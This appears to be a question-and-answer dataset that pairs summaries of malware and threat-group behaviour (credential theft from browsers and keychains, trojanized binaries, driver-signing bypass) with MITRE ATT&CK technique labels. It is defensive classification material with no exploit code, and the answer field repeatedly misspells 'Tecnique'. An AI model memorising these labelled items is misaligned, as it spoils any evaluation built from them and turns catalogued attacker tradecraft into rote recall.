+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has modified the `:Zone.Identifier` in the ADS area to zero.,"Tecnique: T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has been packaged in ISO files in order to bypass Mark of the Web (MOTW) security measures.,"Tecnique: T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used malware to turn off the RequireSigned feature which ensures only signed DLLs can be run on Windows.,"Tecnique: T1553.006 Subvert Trust Controls: Code Signing Policy Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has modified variables in kernel memory to turn off Driver Signature Enforcement after exploiting vulnerabilities that obtained kernel mode privileges.,"Tecnique: T1553.006 Subvert Trust Controls: Code Signing Policy Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has enabled the TESTSIGNING boot configuration option to facilitate loading of a driver component.,"Tecnique: T1553.006 Subvert Trust Controls: Code Signing Policy Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.,"Tecnique: T1553.006 Subvert Trust Controls: Code Signing Policy Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can use CVE-2017-15303 to disable Windows Driver Signature Enforcement (DSE) protection and load its driver.,"Tecnique: T1553.006 Subvert Trust Controls: Code Signing Policy Modification, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used a trojanized version of Windows Notepad to add a layer of persistence for Industroyer.","Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors trojanized legitimate files in Ivanti Connect Secure appliances with malicious code.","Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has modified legitimate binaries and scripts for Pulse Secure VPNs including the legitimate DSUpgrade.pm file to install the ATRIUM webshell for persistence.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUSHWALK can embed into the legitimate `querymanifest.cgi` file on compromised Ivanti Connect Secure VPNs.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has been embedded into modified OpenSSH binaries to gain persistent access to SSH credential information.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FRAMESTING can embed itself in the CAV Python package of an Ivanti Connect Secure VPN located in `/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py.`,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LIGHTWIRE can imbed itself into the legitimate `compcheckresult.cgi` component of Ivanti Connect Secure VPNs to enable command execution.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LITTLELAMB.WOOLTEA can append malicious components to the `tmp/tmpmnt/bin/samba_upgrade.tar` archive inside the factory reset partition in attempt to persist post reset.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWPULSE is applied in compromised environments through modifications to legitimate Pulse Secure files.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest searches through the /Users/ folder looking for executable files. For each executable, ThiefQuest prepends a copy of itself to the beginning of the file. When the file is executed, the ThiefQuest code is executed first. ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior.","Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WARPWIRE can embed itself into a legitimate file on compromised Ivanti Connect Secure VPNs.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIREFIRE can modify the `visits.py` component of Ivanti Connect Secure VPNs for file download and arbitrary command execution.,"Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.","Tecnique: T1554 Compromise Host Software Binary, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum can collect email credentials from victims.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has run `cmdkey` on victim machines to identify stored credentials.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used several tools for retrieving login and password information, including LaZagne.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro has obtained credentials from mail clients via NirSoft MailPassView.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has attempted to obtain credentials from OpenSSH, realvnc, and PuTTY.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has the ability to steal credentials from FTP clients and wireless profiles.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses an external software known as NetPass to recover passwords.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp's passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate use Nirsoft Network Password Recovery or NetPass tools to steal stored RDP credentials in some malware versions.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can collect credentials from WINSCP.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can obtain credentials from databases, mail, and WiFi across multiple platforms.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka is capable of stealing Outlook passwords.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu has obtained credentials from mail clients via NirSoft MailPassView.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can retrieve passwords from messaging and mail client applications.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OLDBAIT collects credentials from several email clients.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has the ability to steal saved passwords from Microsoft Outlook.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, and Microsoft Outlook.","Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can decrypt passwords stored in the RDCMan configuration file.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in Prikormka collects passwords stored in applications installed on the victim.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can use Lazagne for harvesting credentials.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can obtain passwords from common FTP clients.,"Tecnique: T1555 Credentials from Password Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto collects Keychain storage data and copies those passwords/tokens to a file.,"Tecnique: T1555.001 Credentials from Password Stores: Keychain, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can use Keychain Services API functions to find and collect passwords, such as `SecKeychainFindInternetPassword` and `SecKeychainItemCopyAttributesAndData`.","Tecnique: T1555.001 Credentials from Password Stores: Keychain, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can obtain credentials from macOS Keychains.,"Tecnique: T1555.001 Credentials from Password Stores: Keychain, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can dump credentials from the macOS keychain.,"Tecnique: T1555.001 Credentials from Password Stores: Keychain, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton gathers credentials in files for keychains.,"Tecnique: T1555.001 Credentials from Password Stores: Keychain, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: iKitten collects the keychains on the system.,"Tecnique: T1555.001 Credentials from Password Stores: Keychain, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap uses the keychaindump project to read securityd memory.,"Tecnique: T1555.002 Credentials from Password Stores: Securityd Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 stole users' saved passwords from Chrome.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has used tools to dump passwords from browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used BrowserGhost, a tool designed to obtain credentials from browsers, to retrieve information from password stores.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ajax Security Team has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used the Stealer One credential stealer to target web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used a Mimikatz-based tool and a PowerShell script to steal passwords from Google Chrome.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used browser extensions including Google Chrome to steal passwords and cookies from browsers. Kimsuky has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has obtained passwords and session tokens with the use of the Redline password stealer.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used several tools for retrieving login and password information, including LaZagne.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro has stolen credentials stored in the victim’s browsers via software tool NirSoft WebBrowserPassView.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. OilRig has also used tool named PICKPOCKET to dump passwords from web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork dumped the login data database from \AppData\Local\Google\Chrome\User Data\Default\Login Data.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team's CredRaptor tool can collect saved passwords from various internet browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used malware to gather credentials from Internet Explorer.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can gather credentials from a number of browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can steal credentials from the victim's browser.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Backdoor.Oldrea samples contain a publicly available Web browser password recovery tool.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp's passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes steals credentials stored inside Internet Explorer.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes can steal login credentials and stored financial information from the browser.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner can steal saved usernames and passwords in Chrome as well as credit card credentials.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke collects user credentials, including passwords, for various programs including Web browsers.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a module to steal credentials from Web browsers on the victim machine.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed dropping browser password grabber modules.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use modules that extract passwords from common web browsers such as Firefox and Chrome.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can steal cookie data and credentials from Google Chrome.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a PasswordRecoveryPacket module for recovering browser passwords.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy attempts to collect passwords from browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has a module to collect usernames and passwords stored in browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete collects stored credentials from several web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz has the ability to steal credentials from web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DPAPI.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu can steal credentials from Google Chrome.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OLDBAIT collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer contains a module that tries to obtain stored credentials from web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used a Python tool named Browdec.exe to steal browser credentials.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in Prikormka gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton gathers credentials for Google Chrome.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can use Lazagne for harvesting credentials.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has collected usernames and passwords from Firefox and Chrome.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can obtain passwords from common web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can steal credentials stored in Web browsers by querying the sqlite database.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use tools to collect credentials from web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can gather browser usernames and passwords.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can collect clear text web credentials for Internet Explorer/Edge.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP variants have harvested credentials from browsers such as Firefox, Chrome, Opera, and Edge.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
